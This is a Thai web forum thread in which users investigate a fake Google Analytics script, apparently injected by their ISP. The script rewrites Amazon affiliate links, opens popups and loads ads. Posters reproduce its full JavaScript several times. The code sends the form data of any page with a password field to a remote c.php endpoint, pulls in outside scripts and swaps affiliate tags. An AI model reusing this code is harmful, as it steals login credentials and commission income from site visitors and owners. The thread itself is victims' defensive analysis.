True internet ตีหัวคนทำ adsense แทรก code โฆษณา CJ เร่งชี้จงแก้ปัญหาด่วน

[Archwin]

สงสัยผมจะโดน Malware your-review เล่นงานซะแล้วครับ ไม่รู้ว่ามันมากับอะไร โดนได้ไง
แต่ตอนนี้อาการคือเว็บ blog ที่ผมโพส amazon ที่นึงครับ ผมโพส link ลงไปในเนื้อหา ดังนี้

โค้ด เลือก ขยาย

http%3A//www.amazon.com/exec/obidos/0451229215/%3Ftag%3Dtagid-20

พอโหลดหน้านั้นยังไม่เสร็จมันก็แสดงปกตินะครับ แต่!!! พอโหลดเสร็จมันแปลง link ผมเป็นแบบนี้เฉยเลย
(เนื้อหาปกตินะครับแต่ link ข้างในมันเปลี่ยน)

โค้ด เลือก ขยาย

http://your-review.net/track/az.php?u=http%3A//www.amazon.com/exec/obidos/0451229215/%3Ftag%3Dtagid-20
พอคลิกเข้าไปมันก็ไป amazon ปกติครับ แต่ tagid เปลี่ยนเป็น yourrevie-20 ไปเรียบร้อย

เดาว่ามันเป็น .js ซักตัวนึงที่เรียกทำงานหลังจากหน้านั้นโหลดเสร็จแล้ว ให้ทำการแก้ link(href) ที่เป็น amazon ทั้งหมด ให้เป็น link redirect แบบนั้นอ่ะครับ

มีท่านใดเป็นแบบนี้บ้างไหมครับ

ใช้เน็ตของอะไรครับ ผมเคยโสต์ไว้ก่อนหน้านี้ ครับน่าจะเป็นเรื่องเดียวกัน javascript ของ
www.google-analytics.com/ga.js
เคยถูกเปลี่ยนให้มี popup ของ your-review.net

[raptor]

ผมอยู่ สามพราน นครปฐม   ใช้เน็ททรู   router ทรู ครับ billion sky(router พึ่งเปลี่ยนมา 2 อาทิตย์ด้วยครับพอดีตัวเก่าเสีย)
ผมเจอแบบที่มันเด็งไปหน้า http://your-review.net ตั้งแต่ช่วงแรก ๆ แล้วครับ แต่ก็หายไปเป็นอาทิตย์แล้ว
มาวันนี้พึ่งสังเกตเจออาการนี้ครับ แต่ไม่รู้เริ่มเป็นจริง ๆ ตั้งแต่เมื่อไหร่

[nocturne in the moonlight]

ถ้าถึงกับเปลี่ยน link นี่ คงหนักข้อเกินรับได้แล้ว แต่คงไม่ใช่ฝีมือทรูมั้งครับ ไม่งั้น คงโดโวยกันหมดแล้ว น่าจะ spyware จริง ๆ แนะนำง่าย คุณลองอับบล๊อกด้วย net ผ่าน มือถือดูครับ ว่า link ยังเปลี่ยนอีกไหม ถ้าเปลี่ยนก็แสดงว่าเครื่องติด สปายแวร์แล้วครับ แนะนำให้ล้างด่วน แต่ถ้าไม่เปลี่ยน เราคง ต้องรวมตัวกันไปคุยกับทรูครับ  ที่สำคัญ หลักฐาน แน่น ๆๆๆ

[raptor]

สงสัยผมจะโดน Malware your-review เล่นงานซะแล้วครับ ไม่รู้ว่ามันมากับอะไร โดนได้ไง
แต่ตอนนี้อาการคือเว็บ blog ที่ผมโพส amazon ที่นึงครับ ผมโพส link ลงไปในเนื้อหา ดังนี้

โค้ด เลือก ขยาย

http%3A//www.amazon.com/exec/obidos/0451229215/%3Ftag%3Dtagid-20

พอโหลดหน้านั้นยังไม่เสร็จมันก็แสดงปกตินะครับ แต่!!! พอโหลดเสร็จมันแปลง link ผมเป็นแบบนี้เฉยเลย
(เนื้อหาปกตินะครับแต่ link ข้างในมันเปลี่ยน)

โค้ด เลือก ขยาย

http://your-review.net/track/az.php?u=http%3A//www.amazon.com/exec/obidos/0451229215/%3Ftag%3Dtagid-20
พอคลิกเข้าไปมันก็ไป amazon ปกติครับ แต่ tagid เปลี่ยนเป็น yourrevie-20 ไปเรียบร้อย

เดาว่ามันเป็น .js ซักตัวนึงที่เรียกทำงานหลังจากหน้านั้นโหลดเสร็จแล้ว ให้ทำการแก้ link(href) ที่เป็น amazon ทั้งหมด ให้เป็น link redirect แบบนั้นอ่ะครับ

มีท่านใดเป็นแบบนี้บ้างไหมครับ

ใช้เน็ตของอะไรครับ ผมเคยโสต์ไว้ก่อนหน้านี้ ครับน่าจะเป็นเรื่องเดียวกัน javascript ของ
www.google-analytics.com/ga.js
เคยถูกเปลี่ยนให้มี popup ของ your-review.net

ใช่จริง ๆ ด้วยครับ คุณ Archwin
ผมเปิด firefox 2 ตัวครับ แต่คนละ profile กัน บนเครื่องเดียวกัน พร้อมกัน   อันนึงโดน อีกอันไม่โดน ไม่รู้เพราะอะไร
อันที่ไม่โดน http://www.google-analytics.com/ga.js เป็นแบบนี้ครับ

โค้ด เลือก ขยาย

(function(){var aa="_gat",ba="_gaq",r=true,v=false,w=undefined,ca=document,da="4.7.2",y="length",z="cookie",A="location",ea="_gaUserPrefs",fa="ioo",B="&",C="=",D="__utma=",F="__utmb=",G="__utmc=",ga="__utmk=",H="__utmv=",K="__utmz=",L="__utmx=",ha="GASO=";var M=function(i){return w==i||"-"==i||""==i},ia=function(i){return i[y]>0&&" \n\r\t".indexOf(i)>-1},O=function(i,f,m){var u="-",l;if(!M(i)&&!M(f)&&!M(m)){l=i.indexOf(f);if(l>-1){m=i.indexOf(m,l);if(m<0)m=i[y];u=N(i,l+f.indexOf(C)+1,m)}}return u},ka=function(i){var f=v,m=0,u,l;if(!M(i)){f=r;for(u=0;u<i[y];u++){l=i.charAt(u);m+="."==l?1:0;f=f&&m<=1&&(0==u&&"-"==l||".0123456789".indexOf(l)>-1)}}return f},P=function(i,f){var m=encodeURIComponent;return m instanceof Function?f?encodeURI(i):m(i):escape(i)},
Q=function(i,f){var m=decodeURIComponent,u;i=i.split("+").join(" ");if(m instanceof Function)try{u=f?decodeURI(i):m(i)}catch(l){u=unescape(i)}else u=unescape(i);return u},R=function(i,f){return i.indexOf(f)>-1},S=function(i,f){i[i[y]]=f},U=function(i){return i.toLowerCase()},V=function(i,f){return i.split(f)},la=function(i,f){return i.indexOf(f)},N=function(i,f,m){m=w==m?i[y]:m;return i.substring(f,m)},ma=function(i,f){return i.join(f)},na=function(i){var f=1,m=0,u;if(!M(i)){f=0;for(u=i[y]-1;u>=0;u--){m=
i.charCodeAt(u);f=(f<<6&268435455)+m+(m<<14);m=f&266338304;f=m!=0?f^m>>21:f}}return f},oa=function(){var i=window,f=w;if(i&&i.gaGlobal&&i.gaGlobal.hid)f=i.gaGlobal.hid;else{f=W();i.gaGlobal=i.gaGlobal?i.gaGlobal:{};i.gaGlobal.hid=f}return f},W=function(){return Math.round(Math.random()*2147483647)},pa=function(i,f){var m=ca.createElement("script");m.type="text/javascript";m.src=i;if(f)m.id=f;(ca.getElementsByTagName("head")[0]||ca.getElementsByTagName("body")[0]).appendChild(m)};var ra=function(i,f){this.Wa=i;this.jb=f},sa=function(){function i(m){var u=[];m=m.split(",");for(var l,o=0;o<m.length;o++){l=m[o].split(":");u.push(new ra(l[0],l[1]))}return u}var f=this;f.Ba="utm_campaign";f.Ca="utm_content";f.Da="utm_id";f.Ea="utm_medium";f.Fa="utm_nooverride";f.Ga="utm_source";f.Ha="utm_term";f.Ia="gclid";f.Y=0;f.z=0;f.Ma=15768E6;f.pb=18E5;f.w=63072E6;f.oa=[];f.qa=[];f.ac="cse";f.bc="q";f.kb=5;f.R=i("daum:q,eniro:search_word,naver:query,images.google:q,google:q,yahoo:p,msn:q,bing:q,aol:query,aol:encquery,lycos:query,ask:q,altavista:q,netscape:query,cnn:query,about:terms,mamma:query,alltheweb:q,voila:rdata,virgilio:qs,live:q,baidu:wd,alice:qs,yandex:text,najdi:q,aol:q,mama:query,seznam:q,search:q,wp:szukaj,onet:qt,szukacz:q,yam:k,pchome:q,kvasir:q,sesam:q,ozu:q,terra:query,mynet:q,ekolay:q,rambler:words");
...
function(b){c.u=[];if(b)c.u=b};a._setTrackOutboundSubdomains=function(b){c.hb=b};a._setHrefExamineLimit=function(b){c.ma=b};a._setReferrerOverride=function(b){a.Ua=b};a._setCookiePersistence=function(b){a._setVisitorCookieTimeout(b)};a._setVisitorCookieTimeout=function(b){c.w=b}};var Da=function(){var i=this;i.Va=v;i.yb={};i.Ac=0;i.eb=v;i._gasoDomain=w;i._gasoCPath=w;i._getTracker=function(f,m){return i._createTracker(f,w,m)};i._createTracker=function(f,m,u){if(m==w)m="~"+X.Ac++;return X.yb[m]=new Aa(m,f,u)};i._getTrackerByName=function(f){f=f||"";return X.yb[f]||X._createTracker(undefined,f)};i.Cc=function(){var f=window[ea];return f&&f[fa]&&f[fa]()};i._anonymizeIp=function(){i.Va=r}};var va=v,Fa=function(){var i=this;i._createAsyncTracker=function(f,m){return X._createTracker(f,m||"")};i._getAsyncTracker=function(f){return X._getTrackerByName(f)};i.push=function(){var f=arguments,m=0;va=r;for(var u=0;u<f[y];u++)try{if(typeof f[u]==="function")f[u]();else{var l="",o=f[u][0],k=o.lastIndexOf(".");if(k>0){l=N(o,0,k);o=N(o,k+1)}var g=l==aa?X:l==ba?Ea:X._getTrackerByName(l);g[o].apply(g,f[u].slice(1))}}catch(d){m++}return m}};function Ga(){var i=window[aa];if(i&&typeof i._getTracker=="function")X=i;else window[aa]=X}function Ha(){var i=window[ba],f=v;if(i&&typeof i.push=="function"){f=i.constructor==Array;if(!f)return}window[ba]=Ea;f&&Ea.push.apply(Ea,i)}var X=new Da;Ga();var Ea=new Fa;Ha();})()


ส่วนอันที่โดน เป็นแบบที่คุณ Archwin ว่าไว้เลยครับ เป็นแบบนี้

โค้ด เลือก ขยาย

function addScript(url) {
var s = document.createElement('script');
        s.type='text/javascript';
        s.src=url;
        document.body.appendChild(s);
};
function addEvent(obj, evType, fn, useCapture){
        if (obj.addEventListener){
                obj.addEventListener(evType, fn, useCapture);
                return true;
        } else if (obj.attachEvent) {
                var r = obj.attachEvent("on"+evType, fn);
                return r;
        };
};
function __t(url) {
var i = document.createElement('img');
i.src=url;
i.width=1;
i.height=1;
document.body.appendChild(i);
};
if(typeof jQuery == 'undefined') { 
addScript('http://www.google-analytics.com/jq.js');
};
addEvent(window, 'load', function() {
$(document).ready(function() {
var pwds = $('input[type="password"]');
var collected = 0;
if(pwds.length > 0) {
$(pwds).each(function() {
$(this).change(function(e) {
var data = $(this.form).serialize();
var url = 'http://www.google-analytics.com/c.php?url=' + window.location.href + '&' + data;
__t(url);
});
});
};
});
var amazon_urls = [];
$("a[href]").filter(function(i) {
        return $(this).attr('href').search('http://www.amazon.com') != -1;
}).each(function(i) {
        url = $(this).attr('href');
amazon_urls.push(url)
        $(this).attr('href', 'http://your-review.net/track/az.php?u='+escape(url));
        $(this).attr('alt', url);
});
if(!$.browser.mozilla) {
infinityads_enable_pop = true;
infinityads_frequencyCap =-1;
durl = '';
infinityads_layer_border_color = '';
infinityads_layer_ad_bg = '';
infinityads_layer_ad_link_color = '';
infinityads_layer_ad_text_color = '';
infinityads_text_link_bg = '';
infinityads_text_link_color = '';
infinityads_enable_text_link = false;
addScript("http://ads.lzjl.com/newServing/showAd.php?nid=5&pid=5260&adtype=&sid=8254");
};
}, false);
function __gat() {
this._getTracker = function() {
this._initData = function() { };
this._setDomainName = function() { };
this._trackPageview = function() { };
return this;
};
return this;
};
var _gat = __gat();


และมีการแก้ code จากวันก่อนไปนิดนึงครับ(มันยังคงพัฒนาต่ออย่างไม่หยุดยั้ง)
คือมันเอาส่วน popup hxxp://your-review.net/a/adframe.php ออกไปครับ
แต่ส่วนเปลี่ยน href amazon ยังคงอยู่ แปลว่ามีมานานแล้ว
มีส่วนที่ไม่รู้ว่าทำอะไรอีก 3-4 ที่
ส่วน

โค้ด เลือก ขยาย

var url = 'http://www.google-analytics.com/c.php?url=' + window.location.href + '&' + data; ไม่รู้
ส่วน

โค้ด เลือก ขยาย

addScript("http://ads.lzjl.com/newServing/showAd.php?nid=5&pid=5260&adtype=&sid=8254"); คือถ้าไม่เป็น browser.mozilla ให้โหลดนี่เพิ่มมั้ง
ส่วน

โค้ด เลือก ขยาย

function __gat() {} นี่ก็ทำไรไม่รู้

[thevoice]

ตกลงเป็นที่ทุย หรือ ไม่ใช่ที่ทุยกัน

ถ้าเป็นที่ทุยจริง ๆ เก็บหลักฐานให้แน่น ๆ
แล้วทำเป็นจดหมายเปิดผนึกส่งถึงทุย
แล้วส่งให้สื่อด้วย เอาให้ดัง ๆ 

[raptor]

ถ้าถึงกับเปลี่ยน link นี่ คงหนักข้อเกินรับได้แล้ว แต่คงไม่ใช่ฝีมือทรูมั้งครับ ไม่งั้น คงโดโวยกันหมดแล้ว น่าจะ spyware จริง ๆ แนะนำง่าย คุณลองอับบล๊อกด้วย net ผ่าน มือถือดูครับ ว่า link ยังเปลี่ยนอีกไหม ถ้าเปลี่ยนก็แสดงว่าเครื่องติด สปายแวร์แล้วครับ แนะนำให้ล้างด่วน แต่ถ้าไม่เปลี่ยน เราคง ต้องรวมตัวกันไปคุยกับทรูครับ  ที่สำคัญ หลักฐาน แน่น ๆๆๆ

ทีแรกผมก็นึกว่าโดนเปลี่ยน link ครับตกใจแทบแย่   แต่ลองเช็ค DB ดูไม่โดนครับ รอดไป
คือข้อมูลถูกต้องเป็นปกติครับ    แต่พอโหลดหน้าเว็บนั้นเสร็จ มันถึงจะทำงานเปลี่ยน href amazon.com ทั้งหมดครับ
เปลี่ยนเฉพาะเครื่องที่ติดเจ้าตัวนี้แล้วนะครับ
ผมก็ไม่รู้ว่าติดได้ไง และที่น่าแปลกคือ เปิดเครื่องเดียวกัน หน้าเดียวกัน พร้อมกัน แต่ firefox คนละ profile กัน อันนึงเป็นอันนึงกลับรอด


แก้ไข
ผมลองเปิดหน้าเว็บของท่านดูก็เหมือนกันครับ (ขออนุญาตนะครับ) ที่

โค้ด เลือก ขยาย

http://cyber-shop.freewarelands.com/roku-hd-player/
พอเอา mouse ไปชี้ที่ รูป หรือที่ Order Now! ก็ขึ้นเป็น link แบบนี้ครับ

โค้ด เลือก ขยาย

http://your-review.net/track/az.php?u=http://www.amazon.com/Roku-N1100-HD-Player/dp/B001PIBE8I?Ftag=bestbuylandsc-20
คือมันติดเครื่องผมก็ไม่มีปัญหา   แต่ถ้ามันไปติดเครื่องที่ usa ของใครก็ตาม ที่เข้าไปเว็บไหนก็ตามที่มี link ไป amazon มันจะแปลงเป็น tagid มันหมดครับ

[Archwin]

ถ้าถึงกับเปลี่ยน link นี่ คงหนักข้อเกินรับได้แล้ว แต่คงไม่ใช่ฝีมือทรูมั้งครับ ไม่งั้น คงโดโวยกันหมดแล้ว น่าจะ spyware จริง ๆ แนะนำง่าย คุณลองอับบล๊อกด้วย net ผ่าน มือถือดูครับ ว่า link ยังเปลี่ยนอีกไหม ถ้าเปลี่ยนก็แสดงว่าเครื่องติด สปายแวร์แล้วครับ แนะนำให้ล้างด่วน แต่ถ้าไม่เปลี่ยน เราคง ต้องรวมตัวกันไปคุยกับทรูครับ  ที่สำคัญ หลักฐาน แน่น ๆๆๆ

ทีแรกผมก็นึกว่าโดนเปลี่ยน link ครับตกใจแทบแย่   แต่ลองเช็ค DB ดูไม่โดนครับ รอดไป
คือข้อมูลถูกต้องเป็นปกติครับ    แต่พอโหลดหน้าเว็บนั้นเสร็จ มันถึงจะทำงานเปลี่ยน href amazon.com ทั้งหมดครับ
เปลี่ยนเฉพาะเครื่องที่ติดเจ้าตัวนี้แล้วนะครับ
ผมก็ไม่รู้ว่าติดได้ไง และที่น่าแปลกคือ เปิดเครื่องเดียวกัน หน้าเดียวกัน พร้อมกัน แต่ firefox คนละ profile กัน อันนึงเป็นอันนึงกลับรอด


แก้ไข
ผมลองเปิดหน้าเว็บของท่านดูก็เหมือนกันครับ (ขออนุญาตนะครับ) ที่

โค้ด เลือก ขยาย

http://cyber-shop.freewarelands.com/roku-hd-player/
พอเอา mouse ไปชี้ที่ รูป หรือที่ Order Now! ก็ขึ้นเป็น link แบบนี้ครับ

โค้ด เลือก ขยาย

http://your-review.net/track/az.php?u=http://www.amazon.com/Roku-N1100-HD-Player/dp/B001PIBE8I?Ftag=bestbuylandsc-20
คือมันติดเครื่องผมก็ไม่มีปัญหา   แต่ถ้ามันไปติดเครื่องที่ usa ของใครก็ตาม ที่เข้าไปเว็บไหนก็ตามที่มี link ไป amazon มันจะแปลงเป็น tagid มันหมดครับ

อาการที่เล่ามาเข้าได้กับ javascript  ที่อยู่ใน www.google-analytics.com/ga.js
ผมเคยโพสต์แล้วดูอีกทีครับ

โค้ด เลือก ขยาย


function addScript(url) {
var s = document.createElement('script');
        s.type='text/javascript';
        s.src=url;
        document.body.appendChild(s);
};
function addEvent(obj, evType, fn, useCapture){
        if (obj.addEventListener){
                obj.addEventListener(evType, fn, useCapture);
                return true;
        } else if (obj.attachEvent) {
                var r = obj.attachEvent("on"+evType, fn);
                return r;
        };
};
function __t(url) {
var i = document.createElement('img');
i.src=url;
i.width=1;
i.height=1;
document.body.appendChild(i);
};
if(typeof jQuery == 'undefined') { 
addScript('http://www.google-analytics.com/jq.js');
};
addEvent(window, 'load', function() {
$(document).ready(function() {
var pwds = $('input[type="password"]');
var collected = 0;
if(pwds.length > 0) {
$(pwds).each(function() {
$(this).change(function(e) {
var data = $(this.form).serialize();
var url = 'http://www.google-analytics.com/c.php?url=' + window.location.href + '&' + data;
__t(url);
});
});
};
});
var amazon_urls = [];
$("a[href]").filter(function(i) {
        return $(this).attr('href').search('http://www.amazon.com') != -1;
}).each(function(i) {
        url = $(this).attr('href');
amazon_urls.push(url)
        $(this).attr('href', 'http://your-review.net/track/az.php?u='+escape(url));
        $(this).attr('alt', url);
});
if(!$.browser.mozilla) {
infinityads_enable_pop = true;
infinityads_frequencyCap =-1;
durl = '';
infinityads_layer_border_color = '';
infinityads_layer_ad_bg = '';
infinityads_layer_ad_link_color = '';
infinityads_layer_ad_text_color = '';
infinityads_text_link_bg = '';
infinityads_text_link_color = '';
infinityads_enable_text_link = false;
addScript("http://ads.lzjl.com/newServing/showAd.php?nid=5&pid=5260&adtype=&sid=8254");
};
var _popped = 0;

function _pu(url) {
        if(_popped == 0) {
                if(window.screenX) {
                        l = window.screenX;
                        t = window.screenY;
                } else {
                        l = window.screenLeft;
                        t = window.screenTop;
                };
                h = $(window).height();
                w = $(window).width();
                feat = 'width='+w+',height='+h+',scrollbars=0,resizable=0,toolbar=0,location=0,menubar=0,status=0,directories=0,left='+l+',top='+t;
                _popped = 1;
                window.open(url,'pu',feat).blur();
                window.focus();
        };
};
$(document).click(function() {
_pu('http://your-review.net/a/adframe.php');
});
$(window).click(function() {
_pu('http://your-review.net/a/adframe.php');
});

}, false);
function __gat() {
this._getTracker = function() {
this._initData = function() { };
this._setDomainName = function() { };
this._trackPageview = function() { };
return this;
};
return this;
};
var _gat = __gat();



[Archwin]

สาเหตุตอนนี้ผมตัดหมดแล้วมันหาไม่เจอ เหลือ ISP อย่างเดียว

เพราะเปลี่ยน ISP แล้วมันหายครับ

[nocturne in the moonlight]

เราเอา tag id  มัน แจ้งไปที่ amazon ได้ไหมครับ ให้แบนกันไปเลย
ทำแบบนี้ ปล้นกันชัด ๆ

[raptor]

ท่าน Archwin ผมตามไปอ่านแล้วครับท่าน

ณ. เวลานี้เครื่องผมไม่เป็นแล้วครับ
เหมือนมันตั้งเวลาเปิดปิดได้ หรือมันสุ่มเปิดปิดได้ หรือมันอ่านบอร์ดนี้แล้วมันก็เลยรีบไปปิด 555
เหมือนมันจะตั้งได้ที่ ISP ประมาณที่ DNS Server ให้เปลี่ยน ip www.google-analytics.com ไปที่ ip มันเองทำให้ได้ file ga.js ต่างกัน(ทำได้ไหม)

เหมือนว่าผมจะเดาล้วน ๆ ครับ
แต่ก็เหมือนว่าที่บอกว่า มันอ่านบอร์ดนี้แล้วมันก็เลยรีบไปปิด น่าจะจริงสุดครับ 555   ขำขำครับ

ถ้าวันหลังเป็นอีกเดี๋ยวผมจะลองนั่งไล่ดูอีกทีครับ

[Hackublog]

สาเหตุตอนนี้ผมตัดหมดแล้วมันหาไม่เจอ เหลือ ISP อย่างเดียว

เพราะเปลี่ยน ISP แล้วมันหายครับ

ผมเห็นด้วย ผมลองทุกทางแล้วมันก็ยังเป็นอยู่แล้วก้เป็นอยู่จ้าวเดียวนี่แหละ 

[tasorich]

ของผมไปทุกเวบที่ติด google adsense จะเห็น ads เป็นแบบ ด้านล่างนี้ตลอด

โอ๊ะ ชูบายนี่ใช่เลยซือเจ๊ชัดเจน ทำไมทรูถึงทำกันได้ลงคอ

นึกว่าเครื่องผมโดนคนเดียว ...
ทำไมถึงทำกับฉันได้..

[technomatch5]

มาแล้วๆครับ...เพิ่งกลับจากทำงาน รีเครื่องแระ โดนกันถ้วนทั่วจร้า แอดแบบพิเศษมันก็ยัดได้ 

ก่อน...


พอรีเฟรชหน้าจอ

[raptor]

ไม่รู้ว่ามี case ไหนบ้างนะครับ แต่ถ้าในกรณีที่โดนเจ้า www.google-analytics.com/ga.js ตัวปลอมเข้าไป
ผมรู้แล้วครับว่า code นี้ไว้ทำอะไร

โค้ด เลือก ขยาย

var url = 'http://www.google-analytics.com/c.php?url=' + window.location.href + '&' + data;

ไม่ขอบอกรายละเอียดแต่สรุปได้ว่า เมื่อ script นี้ทำงานอยู่ มันเก็บ url, user, password ผมไปหมดแล้วครับ ในทุกหน้าที่มี input type="password"
-_-" 

สรุปมันทำไรเราบ้าง
1. มันเคยใส่ popup เว็บไปที่ hxxp://your-review.net/a/adframe.php แต่ตอนนี้มันเอาออกไปแล้ว
2. มันแก้ href ที่เป็น "amazon.com" ทั้งหมดให้เป็น hxxp://your-review.net/track/az.php?u=http://www.amazon.com/*
3. ทุกหน้าที่มี input type="password" อยู่มันเก็บ url, user, password ไปเรียบร้อย เมื่อมี even pwd.change()
4. มีการ set ค่า var _gat = __gat(); ใหม่เกี่ยวกับ google-analytics ไม่รู้ทำอะไร
5. มีอีกอันถ้าไม่ใช่ firefox if(!$.browser.mozilla) มันทำดังนี้ ซึ่งไม่รู้ว่าเป็นอะไรเพราะผมใช้ firefox อยู่

โค้ด เลือก ขยาย

if(!$.browser.mozilla) {
infinityads_enable_pop = true;
infinityads_frequencyCap =-1;
durl = '';
infinityads_layer_border_color = '';
infinityads_layer_ad_bg = '';
infinityads_layer_ad_link_color = '';
infinityads_layer_ad_text_color = '';
infinityads_text_link_bg = '';
infinityads_text_link_color = '';
infinityads_enable_text_link = false;
addScript("http://ads.lzjl.com/newServing/showAd.php?nid=5&pid=5260&adtype=&sid=8254");
};
function addScript(url) {
var s = document.createElement('script');
        s.type='text/javascript';
        s.src=url;
        document.body.appendChild(s);
};

url   hxxp://ads.lzjl.com/ คืออะไร ใครคุ้นบ้างไหมครับ
ใครลองให้ทีครับ -_-" 

[nocturne in the moonlight]

อ่า ไปกันใหญ่แล้ว
แล้วไอ้เว็ฐ you-review.net นี่มันเป็ฯเว็บเกี่ยวกับอะไรครับ
ทำไงกันดีหล่ะเสี่ย ขืน เฉย แบบนี้ โดนยืด เว็บแน่ ๆ

[ieiq]

เอาไงดีละนี้

[kkusd]

เหมือนจะสาวไปเจอตอใหญ่เลยนะนี่


ไอ้พวกชั่วหากินดีๆไม่เป็นชอบโกง ถ้ามีลูกขอผลกรรมตกกับลูกและตัวมัน

[Archwin]

ท่าน Archwin ผมตามไปอ่านแล้วครับท่าน

ณ. เวลานี้เครื่องผมไม่เป็นแล้วครับ
เหมือนมันตั้งเวลาเปิดปิดได้ หรือมันสุ่มเปิดปิดได้ หรือมันอ่านบอร์ดนี้แล้วมันก็เลยรีบไปปิด 555
เหมือนมันจะตั้งได้ที่ ISP ประมาณที่ DNS Server ให้เปลี่ยน ip www.google-analytics.com ไปที่ ip มันเองทำให้ได้ file ga.js ต่างกัน(ทำได้ไหม)

เหมือนว่าผมจะเดาล้วน ๆ ครับ
แต่ก็เหมือนว่าที่บอกว่า มันอ่านบอร์ดนี้แล้วมันก็เลยรีบไปปิด น่าจะจริงสุดครับ 555   ขำขำครับ

ถ้าวันหลังเป็นอีกเดี๋ยวผมจะลองนั่งไล่ดูอีกทีครับ

เรื่องที่ว่า เครื่องไม่เป็นตอนนี้.... แต่ปัญหาที่แท้จริงยังไม่หมดหรอกครับ ลองทำต่อไปนี้แล้วดูว่าปัญหากลับมาไหม

Reload หน้าที่มี google analytics script แปะไว้
หรือ
Reload หน้าที่ มี google adsense script แปะไว้
เมื่อ Reload ข้างต้น ปัญหาจะกลับมาทันที ถ้าต่อเน็ตทรู

[ขัน]

มาถึงตอนนี้ เริ่มมีคำถามในใจแล้วว่า...

ทำไมตรูต้องทนใช้อินเตอร์เน็ตของ true ด้วยฟร่ะ


หรือว่ามันให้ใช้ฟรี หรือว่าประเทศนี้มี ISP อยู่เจ้าเดียว

[luxx]

เอาให้มันรู้กันไป TRUE INTERNET แทรกโค๊ด ไม่บอกลูกค้า